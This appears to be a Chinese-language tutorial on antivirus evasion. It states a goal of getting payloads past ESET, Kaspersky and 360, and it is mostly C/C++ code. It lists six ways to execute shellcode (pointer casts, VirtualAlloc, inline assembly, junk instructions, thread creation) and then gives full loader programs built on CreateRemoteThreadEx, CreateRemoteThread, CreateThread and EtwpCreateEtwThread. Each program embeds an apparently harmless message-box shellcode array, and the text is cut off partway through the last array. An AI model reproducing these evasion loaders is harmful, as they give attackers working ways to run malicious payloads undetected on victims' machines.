所有的免杀学习都需要从如何执行shellcode开始,那么该如何执行shellcode呢?执行shellcode的方式又有哪些呢?
该专题就是从入门开始,一步步打基础。
学完免杀达到的效果
过ESET
过卡巴斯基(静态+动态)&&360核晶
首先我们需要知道,执行shellcode的方式,有哪些?
shellcode 加载方法
shellcode加载方法有以下6种,都是最简单的入门方式。
1.指针执行
//头文件不写了
//隐藏黑框
#pragma comment(linker, "/subsystem:"Windows" /entry:"mainCRTStartup
"")
int main(){
unsigned char buf[] = "xfcxe8";
((void(*)(void))&buf)();
}
2.申请内存加载
int main()
{
char buf[] = "xfcxe8";
LPVOID exe;
exe = VirtualAlloc(buf, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exe, buf, sizeof(buf));
((void(*)())exe)();
}
3.嵌入汇编加载
int main()
{
unsigned char buf[] = "xfcxe8";
DWORD p;
void* code = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE);
CopyMemory(code, buf, sizeof(buf));
__asm {
mov eax, code
push eax
ret
}
}
unsigned char buf[] = "xfcxe8";
DWORD p;
VirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &p);
__asm {
lea eax,buff
push eax
ret
}
int main()
{
unsigned char buf[] = "xfcxe8";
__asm
{
mov eax, offset buf
jmp eax
}
}
4.创建线程加载
unsigned char buf[] = "xfcxe8";
DWORD p;
void* code = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
CopyMemory(code, buf, sizeof(buf));
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)code, 0, 0, 0);
system("pause");
5.强制类型转换
int main()
{
unsigned char buf[] = "xfcxe8";
((void(WINAPI*)(void)) & buf)();
}
6.汇编花指令
int main()
{
unsigned char buf[] = "xfcxe8";
__asm
{
mov eax, offset buf;
_emit 0xFF;
_emit 0xE0;
}
}
创建线程加载
在了解加载shellcode方式之后,我们本篇幅来详细介绍一些创建线程方式加载shellcode的方法:
CreateRemoteThreadEx-注入自身.cpp
// CreateRemoteThreadEx-注入自身.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
LPVOID exec = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD odProtect = 0;
DWORD dwThreadID = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &odProtect);
if (bRet != 0)
{
HANDLE hThread = CreateRemoteThreadEx(GetCurrentProcess(), NULL, NULL, (LPTHREAD_START_ROUTINE)exec, NULL, NULL, NULL, &dwThreadID);
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
std::cout << "Hello World!n";
}
CreateRemoteThread-注入自身.cpp
// CreateRemoteThread-注入自身.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD old_Protect = 0;
DWORD dwThreadID = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &old_Protect);
if (bRet != 0)
{
HANDLE hThread = CreateRemoteThread(GetCurrentProcess(), NULL, NULL, (LPTHREAD_START_ROUTINE)exec, NULL, NULL, &dwThreadID);
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
std::cout << "Hello World!n";
}
CreateThread.cpp
// CreateThread.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
SIZE_T oldProtect = 0;
printf("buf: %dn", sizeof(x86_nullfree_msgbox));
PVOID exec = VirtualAlloc(NULL,sizeof(x86_nullfree_msgbox),MEM_COMMIT,PAGE_READWRITE);
if (exec == NULL)
{
printf("VirtualAlloc is ERRORn");
}
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
if (VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect) != 0)
{
HANDLE h_thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(h_thread, -1);
}
// deallocate the space
printf("yyyyyyn");
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
EtwpCreateEtwThread-未导出函数.cpp
// EtwpCreateEtwThread-未导出函数.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
